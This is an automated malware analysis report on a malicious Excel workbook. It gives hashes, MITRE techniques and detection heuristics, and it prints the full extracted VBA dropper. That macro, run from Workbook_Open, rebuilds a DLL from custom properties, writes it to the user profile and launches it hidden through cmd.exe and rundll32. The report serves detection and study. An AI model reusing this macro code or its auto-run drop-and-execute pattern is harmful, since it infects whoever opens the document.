Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b79d3c16adfec7f5…

MALICIOUS

Office (OOXML)

279.0 KB Created: 2014-07-02 08:15:15 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2019-02-04
MD5: 01c9cebbc39e273ac1f5af8b629a7327 SHA-1: ec692cf82aef16cf61574b5d15e5c5f8135df288 SHA-256: b79d3c16adfec7f5741f8c867887bed1bff9f979009193ba9f6aa05083068bcc
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059.003 Windows Command Shell

This Excel document contains a Workbook_Open macro that is designed to execute arbitrary code. The macro reconstructs a DLL payload from custom properties and writes it to disk as 'vhostm-<MMDDHHMMSS>.dll' in the user's profile directory. It then attempts to execute this DLL using ShellExecute, indicating a likely downloader or persistence mechanism. The presence of cmd.exe references and the use of Environ("USERPROFILE") further support this.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
Dim sFileText As String
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim filename As String
filename = Environ("USERPROFILE") & "\vhostm-" & (Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now)) & ".dll"
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2577 bytes
SHA-256: d8e3552d0699f7649d974314d9bf468b09fa09a72a870f23d5eb23ca31831f61
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#Else
    Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
        (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If

Private Sub Workbook_Open()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile

allFIleText = ""
sFileText = ""

For Each ws In ThisWorkbook.Worksheets
    If ws.Name <> "Start" Then
     ws.Visible = xlSheetVisible
    End If
Next ws


Sheets("Start").Visible = xlVeryHidden

Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value

Dim TestArray() As String
TestArray = Split(allFIleText, "|")

Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\vhostm-" & (Month(Now) & Day(Now) & Hour(Now) & Minute(Now) & Second(Now)) & ".dll"

If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
    For i = 0 To 290817
      Put #2, , CByte(TestArray(i))
     Next
Close #2
End If

Dim RetVal As Long
'RetVal = ShellExecute(0, "open", filename, "", Environ("USERPROFILE"), 1)

RetVal = ShellExecute(0, "open", "cmd.exe", "/C rundll32.exe " & Chr$(34) & filename & Chr$(34) & ",function", Environ("USERPROFILE"), SW_HIDE)

'SetAttr filename, vbNormal
'Kill filename
    
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 14336 bytes
SHA-256: b298f6d5cc7669a7713a54350663be651fa87911515c13439d5420fa2796dd67

Open this report in the interactive analyzer, or submit your own file for analysis.